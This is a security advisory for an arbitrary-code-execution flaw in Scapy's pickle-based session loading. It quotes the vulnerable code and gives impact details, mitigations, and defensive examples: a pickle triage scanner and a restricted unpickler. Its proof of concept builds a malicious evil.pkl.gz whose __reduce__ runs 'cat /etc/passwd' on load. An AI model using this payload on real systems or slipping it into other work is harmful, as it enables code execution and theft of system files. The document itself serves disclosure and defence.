
GHSA-cq46-m9x9-j8w2: Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization

Summary

An unsafe deserialization vulnerability in Scapy <v2.7.0 allows attackers to execute arbitrary code when a malicious session file is locally loaded via the -s option. This requires convincing a user to manually load a malicious session file.


Details

Scapy’s interactive shell supports session loading using gzip-compressed pickle files:

./run_scapy -s <session_file.pkl.gz>

Internally, this triggers:

# main.py
SESSION = pickle.load(gzip.open(session_name, "rb"))

Since no validation or restriction is performed on the deserialized object, any callable embedded via __reduce__() is invoked by the unpickler while the file is being loaded, i.e. before the interactive shell appears. This makes it trivial for an attacker to drop a malicious .pkl.gz in a shared folder and have it executed by unsuspecting users.

The vulnerability exists in the load_session function, which deserializes data using pickle.load() on .pkl.gz files provided via the -s CLI flag or programmatically through conf.session.

Affected lines in source code: https://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572

try:
    # gzip-compressed session: pickle.load() resolves every GLOBAL in the
    # stream and invokes the callable returned by __reduce__() during loading
    s = pickle.load(gzip.open(fname, "rb"))
except IOError:
    try:
        # fallback for an uncompressed session file, equally unrestricted
        s = pickle.load(open(fname, "rb"))
# ... remainder of load_session omitted; see the linked source
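A practitioner who finds a stray .pkl.gz does not need to load it to find out what it would do. The following is an added example (not Scapy's code) that disassembles the pickle stream with pickletools.genops, which never executes opcodes, and lists every global the stream would import; the RCE class, the sample session files and the scapy. allowlist prefix are constructed here for the demonstration. Note that os.system serialises under its defining module (posix on Linux, nt on Windows), so a check that only looks for the string "os" misses it.

```python
import gzip
import io
import os
import pickle
import pickletools

# Opcodes that push a string onto the unpickler stack. STACK_GLOBAL
# (protocol 4+) consumes the two most recent ones as (module, name).
STRING_OPCODES = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}


class RCE:
    """Constructed malicious session object, same shape as the PoC on this page."""
    def __reduce__(self):
        return (os.system, ("id",))


def build_malicious_session() -> bytes:
    """Constructed sample: a .pkl.gz whose __reduce__ makes the unpickler call os.system."""
    return gzip.compress(pickle.dumps(RCE()))


def build_benign_session() -> bytes:
    """Constructed sample: plain data that references no global at all."""
    return gzip.compress(pickle.dumps({"note": "benign", "pkts": [b"\x00" * 4]}))


def imported_globals(data: bytes) -> list:
    """List every (module, name) the stream would import, without executing it.

    GLOBAL carries "module name" as a single argument; STACK_GLOBAL takes the
    module and name from the two preceding string pushes. The gzip-or-plain
    fallback mirrors load_session, which also accepts an uncompressed file.
    """
    try:
        raw = gzip.decompress(data)
    except (OSError, EOFError):
        raw = data
    strings = []
    found = []
    for opcode, arg, _pos in pickletools.genops(io.BytesIO(raw)):
        if opcode.name in STRING_OPCODES:
            strings.append(arg)
        elif opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
    return found


def suspicious_imports(data: bytes, allowed_prefixes=("scapy.",)) -> list:
    """Globals outside the allowed module prefixes (an assumed allowlist for a Scapy session)."""
    return [
        (module, name)
        for module, name in imported_globals(data)
        if not module.startswith(allowed_prefixes)
    ]


if __name__ == "__main__":
    for label, blob in (("benign", build_benign_session()),
                        ("malicious", build_malicious_session())):
        print(label, suspicious_imports(blob))
```

This is a triage aid, not a sandbox: a stream that reuses a memoised string via BINGET before STACK_GLOBAL is not reconstructed here, and a __reduce__ payload can name any importable callable (builtins.eval, subprocess.Popen), so the only safe decision on an unexpected import is to refuse the file.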

PoC

Create a malicious payload:

import pickle, os, gzip

class RCE:
    # on load, the unpickler imports os.system and calls it with the
    # argument tuple before the deserialized object is ever returned
    def __reduce__(self):
        return (os.system, ("cat /etc/passwd",))

# gzip-compress to match the .pkl.gz format load_session expects
payload = gzip.compress(pickle.dumps(RCE()))

with open("evil.pkl.gz", "wb") as f:
    f.write(payload)

Then run Scapy with:

./run_scapy -s ./evil.pkl.gz

Result: cat /etc/passwd executes immediately, before the interactive shell is shown.



Impact

This is a classic insecure deserialization vulnerability: untrusted pickle data is deserialized without restriction, and a crafted object leads directly to arbitrary code execution.

Any user who can trick another user into loading a crafted .pkl.gz session file (e.g. via -s option) can execute arbitrary Python code.

  • Vulnerability type: Insecure deserialization (Python pickle)
  • CWE: CWE-502: Deserialization of Untrusted Data
  • CVSS v4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • CVSS Score: 5.4 (Medium)
  • Impact: Arbitrary Code Execution
  • Attack vector: Local or supply chain (malicious .pkl.gz)
  • Affected users: Any user who loads session files (even interactively)
  • Affected version: Scapy v2.6.1 (tested); all versions before 2.7.0 per the summary above

Mitigations

  • Do not use ‘sessions’ (the -s option when launching Scapy), and do not point conf.session at a file you did not create yourself.
  • Use Scapy 2.7.0 or later, where the session mechanism has been removed.
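Where a session-like feature has to keep using pickle, the standard hardening is to refuse every global that is not explicitly allowlisted, so a __reduce__ payload has nothing to call. The following is an added example (not Scapy's code or the 2.7.0 fix) showing the vulnerable load path rewritten around a restricted Unpickler, the "Restricting Globals" pattern from the Python pickle documentation; the RCE class, the sample session files and the one-entry allowlist are constructed here for the demonstration.

```python
import collections
import gzip
import io
import os
import pickle


class RCE:
    """Constructed malicious session object, same shape as the PoC on this page."""
    def __reduce__(self):
        return (os.system, ("id",))


# Assumed allowlist for this example. A real one for Scapy would enumerate the
# classes a saved session legitimately references (packet classes, conf, ...);
# nothing from os/posix/nt, subprocess, builtins or importlib belongs on it.
ALLOWED_GLOBALS = frozenset({
    ("collections", "OrderedDict"),
})


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not on the allowlist.

    GLOBAL / STACK_GLOBAL opcodes are resolved through find_class(), so
    overriding it means os.system (or builtins.eval, subprocess.Popen, ...)
    is never imported and a __reduce__ payload cannot be invoked.
    """
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"session file tried to import {module}.{name}; refusing to load")


def safe_load_session(data: bytes):
    """Drop-in for the vulnerable load path: same gzip-or-plain fallback, restricted unpickler."""
    try:
        raw = gzip.decompress(data)
    except (OSError, EOFError):
        raw = data
    return RestrictedUnpickler(io.BytesIO(raw)).load()


def load_or_reject(data: bytes):
    """Return ("ok", obj) or ("rejected", reason) so startup never dies on a bad file."""
    try:
        return ("ok", safe_load_session(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


def build_benign_session() -> bytes:
    """Constructed sample: references only an allowlisted class."""
    return gzip.compress(pickle.dumps(collections.OrderedDict(note="ok", count=2)))


def build_malicious_session() -> bytes:
    """Constructed sample: the page's PoC payload."""
    return gzip.compress(pickle.dumps(RCE()))


if __name__ == "__main__":
    print(load_or_reject(build_benign_session()))
    print(load_or_reject(build_malicious_session()))
```

Even with the allowlist in place, pickle remains a code-execution format: any allowlisted class with a side-effecting __setstate__ or __new__ is still reachable, and a crafted stream can exhaust memory before find_class is ever consulted. Removing the mechanism, as 2.7.0 does, or moving sessions to a data-only format, is the stronger fix.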
Source: ghsa (tags: vulnerability, git, rce)


References

  • GHSA-cq46-m9x9-j8w2
  • secdev/scapy@13621d1
